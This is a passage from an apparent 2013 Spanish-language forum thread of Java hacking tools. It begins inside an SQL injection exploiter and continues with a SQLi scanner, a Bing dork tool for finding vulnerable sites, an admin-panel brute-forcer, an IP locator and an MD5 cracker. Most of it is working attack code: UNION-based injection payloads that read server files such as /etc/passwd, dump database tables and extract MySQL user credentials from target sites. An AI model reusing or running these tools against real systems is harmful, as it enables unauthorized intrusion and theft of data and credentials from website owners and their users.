"/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
        String archivo;
        String web1;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        System.out.println("\n[+] Searching files with load_file() ....\n");

        for (int count = 0; count < archivos.length; count++) {

            archivo = encodehex(archivos[count]);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + archivos[count]);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            }

        }

    }

    private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

        code = toma(web1 + "+from+" + tabla + "--");

        System.out.println("\n[+] Getting Values ...");

        uno = Pattern.compile("K0BRA(.*?)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Values Founds : " + dos.group(1));
            savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                    System.out.println("[+] " + col2 + " : " + dos.group(2));

                    savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                    savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void mysqluser(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;

        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

        System.out.println("\n[+] Searching mysql.user ....");

        code = toma(web1 + "+from+mysql.user--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Users Found : " + dos.group(1));

            savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("\n[+] Host : " + dos.group(1));
                    System.out.println("[+] Username : " + dos.group(2));
                    System.out.println("[+] Password : " + dos.group(3));

                    savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                    savefile(urla, "[+] Username : " + dos.group(2));
                    savefile(urla, "[+] Password : " + dos.group(3));

                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void getcolbydb(String urla, String db, String tab) throws Exception {

        String web1;
        String web2;
        String code;

        String dbf;
        String table;

        int x;

        Pattern uno = null;
        Matcher dos = null;

        dbf = encodehex(db);
        table = encodehex(tab);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getablesbydb(String urla, String db) throws Exception {

        String web1;
        String web2;
        String code;
        String data;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        data = encodehex(db);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting Tables ....");

        code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
            savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }


    }

    private static void getdbs(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

        System.out.println("\n[+] Getting DBS ....");

        code = toma(web1 + "+from+information_schema.schemata--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] DB Found : " + dos.group(1));
                    savefile(urla, "[+] DB Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schemacolumns(String urla, String nombre) throws Exception {

        String web1;
        String web2;
        String code;
        String tablexa;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        tablexa = encodehex(nombre);

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

        System.out.println("\n[+] Getting columns ....");

        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

            savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Column Found : " + dos.group(1));
                    savefile(urla, "[+] Column Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void schematables(String urla) throws Exception {

        String web1;
        String web2;
        String code;
        int x;
        Pattern uno = null;
        Matcher dos = null;

        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

        System.out.println("\n[+] Getting tables ....\n");

        code = toma(web1 + "+from+information_schema.tables--");

        uno = Pattern.compile("K0BRA(.*)K0BRA");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

            savefile(urla, "");

            int finals = Integer.parseInt(dos.group(1));

            for (x = 0; x <= finals; x = x + 1) {

                code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                uno = Pattern.compile("K0BRA(.*)K0BRA");
                dos = uno.matcher(code);

                if (dos.find()) {
                    System.out.println("[+] Table Found : " + dos.group(1));
                    savefile(urla, "[+] Table Found : " + dos.group(1));
                }

            }

        } else {
            System.out.println("[-] Not Found");
        }

    }

    private static void scan(String urla) throws Exception {

        String codex;
        String target;

        Pattern uno = null;
        Matcher dos = null;

        target = urla;

        System.out.println("\n[+] Checking ...\n");

        codex = toma(target + "-1+union+select+666--");

        uno = Pattern.compile("The used SELECT statements have a different number of columns");
        dos = uno.matcher(codex);

        if (dos.find()) {
            System.out.println("[+] Scanning ...\n");

            int x;
            String urlfinal;
            String otrofinal;
            String code;
            String formariny;
            String otroformar;
            String link;

            urlfinal = "";
            formariny = "";

            for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                formariny = formariny + x + ",";

                otrofinal = urlfinal;
                otroformar = formariny;

                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                otroformar = otroformar.substring(0, otroformar.length() - 1);

                code = toma(target + "-1+union+select+" + otrofinal);

                uno = Pattern.compile("RATSXPDOWN(\\d+)");
                dos = uno.matcher(code);

                if (dos.find()) {

                    otroformar = otroformar.replace(dos.group(1), "hackman");

                    link = target + "-1+union+select+" + otroformar;

                    System.out.println("[Target] : " + link);
                    System.out.println("[Limit] : The site has " + x + " columns");
                    System.out.println("[Data] : The number " + dos.group(1) + " print data");

                    savefile(link, "\r\n" + "[Target] : " + link);
                    savefile(link, "[Limit] : The site has " + x + " columns");
                    savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                    manejo(link);

                    System.exit(1);

                }

            }
            System.out.println("[-] Error");
        } else {
            System.out.println("[-] Not vulnerable");
        }

    }

    private static void details(String urla) throws Exception {

        String concat;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

        urla = urla.replace("hackman", concat);

        System.out.println("\n[+] Searching informaion ...\n");

        code = toma(urla);

        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] DB Version : " + dos.group(1));
            System.out.println("[+] DB Name : " + dos.group(2));
            System.out.println("[+] Username : " + dos.group(3));

            savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
            savefile(urla, "[+] DB Name : " + dos.group(2));
            savefile(urla, "[+] Username : " + dos.group(3));

        } else {
            System.out.println("[-] Not found any data");
        }

        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

        code = toma(urla + "+from+information_schema.tables--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] information_schema : on");
            savefile(urla, "[+] information_schema : on");
        } else {
            System.out.println("[-] information_schema : off");
        }

        code = toma(urla + "+from+mysql.user--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] mysqluser : on");
            savefile(urla, "[+] mysqluser : on");
        } else {
            System.out.println("[-] mysquser : off");
        }

        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

        code = toma(urla);
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[-] load_file : on");
            savefile(urla, "[-] load_file : on");
        } else {
            System.out.println("[-] load_file : off");
        }

    }

    private static void savefile(String nombre, String texto) throws Exception {

        String formar;

        URL h = new URL(nombre);

        formar = "logs/" + h.getHost() + ".txt";

        FileWriter writer = new FileWriter(formar, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }

    public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

        byte[] z = text.getBytes();
        StringBuffer h = new StringBuffer();
        String l;
        int n;
        int a = z.length;
        int u;

        for (n = 0; n < a; n++) {
            u = z[n] & 0x000000FF;
            l = Integer.toHexString(u);
            h.append(l);
        }
        return "0x" + h.toString();
    }
}

//The End ?

#208

Java / [Java] SQL Scanner 0.1

Enero 12, 2013, 11:44:27 PM

Un simple Scanner SQLI hecho en Java.

Código: java


//SQL Scanner 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {


        String codex;
        String target;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
        System.out.println("[+] Page : ");
        target = host.nextLine();

        System.out.println("\n[+] Checking ...\n");

        codex = toma(target + "-1+union+select+666--");

        uno = Pattern.compile("The used SELECT statements have a different number of columns");
        dos = uno.matcher(codex);

        if (dos.find()) {
            System.out.println("[+] Scanning ...\n");

            int x;
            String urlfinal;
            String otrofinal;
            String code;
            String formariny;
            String otroformar;
            String link;

            urlfinal = "";
            formariny = "";

            for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                formariny = formariny + x + ",";

                otrofinal = urlfinal;
                otroformar = formariny;

                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                otroformar = otroformar.substring(0, otroformar.length() - 1);

                code = toma(target + "-1+union+select+" + otrofinal);

                uno = Pattern.compile("RATSXPDOWN(\\d+)");
                dos = uno.matcher(code);

                if (dos.find()) {

                    otroformar = otroformar.replace(dos.group(1), "hackman");

                    link = target + "-1+union+select+" + otroformar;

                    System.out.println("[Target] : " + link);
                    System.out.println("[Limit] : The site has " + x + " columns");
                    System.out.println("[Data] : The number " + dos.group(1) + " print data");

                    savefile("logs-scansql.txt", "[Target] : " + link);
                    savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
                    savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");

                    System.out.println("\n[+] Searching informaion ...\n");

                    details(link);

                    System.out.println("\n[+] Finished");

                    System.out.println("\n-- == Coded By Doddy H == --");

                    savefile("logs-scansql.txt", "\n-----------------\n");

                    System.exit(1);

                }

            }
            System.out.println("[-] Error");
        } else {
            System.out.println("[-] Not vulnerable");
        }

    }

    private static void details(String urla) throws Exception {

        String concat;
        String code;

        Pattern uno = null;
        Matcher dos = null;

        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

        urla = urla.replace("hackman", concat);

        code = toma(urla);

        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] DB Version : " + dos.group(1));
            System.out.println("[+] DB Name : " + dos.group(2));
            System.out.println("[+] Username : " + dos.group(3));

            savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
            savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
            savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));

        } else {
            System.out.println("[-] Not found any data");
        }

        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

        code = toma(urla + "+from+information_schema.tables--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] information_schema : on");
            savefile("logs-scansql.txt", "[+] information_schema : on");
        } else {
            System.out.println("[-] information_schema : off");
        }

        code = toma(urla + "+from+mysql.user--");
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[+] mysqluser : on");
            savefile("logs-scansql.txt", "[+] mysqluser : on");
        } else {
            System.out.println("[-] mysquser : off");
        }

        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

//ystem.out.print(urla);

        code = toma(urla);
        uno = Pattern.compile("ERTOR854");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("[-] load_file : on");
            savefile("logs-scansql.txt", "[-] load_file : on");
        } else {
            System.out.println("[-] load_file : off");
        }

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }

    public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

        byte[] z = text.getBytes();
        StringBuffer h = new StringBuffer();
        String l;
        int n;
        int a = z.length;
        int u;

        for (n = 0; n < a; n++) {
            u = z[n] & 0x000000FF;
            l = Integer.toHexString(u);
            h.append(l);
        }
        return "0x" + h.toString();
    }
}

//The End ?

#209

Java / [Java] BingHack Tool 0.1

Enero 12, 2013, 11:43:37 PM

Un simple programa para buscar en Bing paginas vulnerables a SQLI.

Código: java


//
//BingHack Tool 0.1
//Coded By Doddy H
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String tar;
        int x;
        String dork;
        int counte;
        String urlfinal;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == BingHack Tool 0.1 == --\n\n");
        System.out.println("[+] Dork : ");
        dork = host.nextLine();

        System.out.println("[+] Count : ");
        counte = host.nextInt();

        System.out.println("\n[+] Searching ...\n");

        for (x = 10; x <= counte; x = x + 10) {

            code = toma("http://www.bing.com/search?q=" + dork + "&first=" + x);

            uno = Pattern.compile("<h3><a href=\"(.*?)\"");
            dos = uno.matcher(code);

            while (dos.find()) {

                urlfinal = cortar(dos.group(1));

                sql(urlfinal);

            }

        }

        System.out.println("\n[+] Finished");
        System.out.println("\n-- == Coded By Doddy H == --");

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static void sql(String urla) throws Exception {

        String code;
        String mostrar;

        Pattern uno = null;
        Matcher dos = null;

        mostrar = urla + "-1+union+select+666--";

        try {
            code = toma(mostrar);

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] SQLI : " + urla);
                savefile("sql-logs.txt", urla);
            }

        } catch (Exception ex) {
        }

    }

    private static String cortar(String urla) throws Exception {

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("(.*)=(.*)");
        dos = uno.matcher(urla);

        if (dos.find()) {

            return (dos.group(1) + "=");
        } else {
            return "no tengo idea xDD";
        }

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?

#210

Java / [Java] LocateIP 0.1

Enero 12, 2013, 11:42:49 PM

Un simple programa para buscar la localizacion de una IP.

Código: java


//LocateIP 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String ip;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == LocateIP 0.1 == --\n\n");
        System.out.println("[+] IP : ");
        ip = host.nextLine();

        String code;

        code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" + ip);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("City</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] City : Not Found");
        } else {
            System.out.println("[+] City : " + dos.group(2));
        }

        uno = Pattern.compile("Country</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] Country : Not Found");
        } else {
            System.out.println("[+] Country : " + dos.group(2));
        }

        uno = Pattern.compile("State or Region</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] State or Region : Not Found");
        } else {
            System.out.println("[+] State or Region : " + dos.group(2));
        }

//code = toma("http://www.ip-adress.com/reverse_ip/178.33.230.100");

//uno = Pattern.compile("/whois/(.*?)\">Whois");
//dos = uno.matcher(code);

//while(dos.find()) {
//System.out.println("[+] DNS : "+dos.group(1));
//}

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

// The End ?

#211

Java / [Java] PanelFinder 0.1

Enero 12, 2013, 11:42:08 PM

Un simple programa para buscar el famoso panel de administracion en una pagina.

Código: java


//PanelFinder 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.URL;

public class Main {

    public static void main(String[] args) {

        String[] paneles = {
            "admin/admin.asp", "admin/login.asp", "admin/index.asp", "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx", "admin/webmaster.asp", "admin/webmaster.aspx", "asp/admin/index.asp", "asp/admin/index.aspx", "asp/admin/admin.asp", "asp/admin/admin.aspx", "asp/admin/webmaster.asp", "asp/admin/webmaster.aspx", "admin/", "login.asp", "login.aspx", "admin.asp", "admin.aspx", "webmaster.aspx", "webmaster.asp", "login/index.asp", "login/index.aspx", "login/login.asp", "login/login.aspx", "login/admin.asp", "login/admin.aspx", "administracion/index.asp", "administracion/index.aspx", "administracion/login.asp", "administracion/login.aspx", "administracion/webmaster.asp", "administracion/webmaster.aspx", "administracion/admin.asp", "administracion/admin.aspx", "php/admin/", "admin/admin.php", "admin/index.php", "admin/login.php", "admin/system.php", "admin/ingresar.php", "admin/administrador.php", "admin/default.php", "administracion/", "administracion/index.php", "administracion/login.php", "administracion/ingresar.php", "administracion/admin.php", "administration/", "administration/index.php", "administration/login.php", "administrator/index.php", "administrator/login.php", "administrator/system.php", "system/", "system/login.php", "admin.php", "login.php", "administrador.php", "administration.php", "administrator.php", "admin1.html", "admin1.php", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "adm/", "admin/account.php", "admin/account.html", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/login.html", "administrator/account.html", "administrator/account.php", "administrator.html", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/home.asp", "admin/controlpanel.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"};

        String target;
        String ur;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == PanelFinder 0.1 == --\n\n");
        System.out.println("[+] URL : ");
        target = host.nextLine();

        System.out.println("\n[+] Scanning ...\n");

        for (int count = 0; count < paneles.length; count++) {

            ur = target + "/" + paneles[count];

            try {

                URL u = new URL(ur);

                Object o = u.getContent();
                System.out.println("[+] Link : " + ur);
            } catch (Exception ex) {
            }

        }

        System.out.println("\n[+] Finished\n");
        System.out.println("-- == Coded By Doddy H == --");

    }
}

//The End ?

#212

Java / [Java] CrackHash 0.1

Enero 12, 2013, 11:41:12 PM

Un simple programa para crackear un hash md5 mediante una pagina online.

Código: java


//
//CrackHash 0.1
//Coded By Doddy H
//
//Test with 098f6bcd4621d373cade4e832627b4f6
//
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String hash;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == CrackHash 0.1 == --\n\n");
        System.out.println("[+] Hash : ");
        hash = host.nextLine();

        String code;

        code = toma("http://md5.hashcracking.com/search.php?md5=" + hash);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("Cleartext of (.*) is (.*)");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("\n[-] Not Found");
        } else {
            System.out.println("\n[+] Hash Cracked : " + dos.group(2));
        }

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
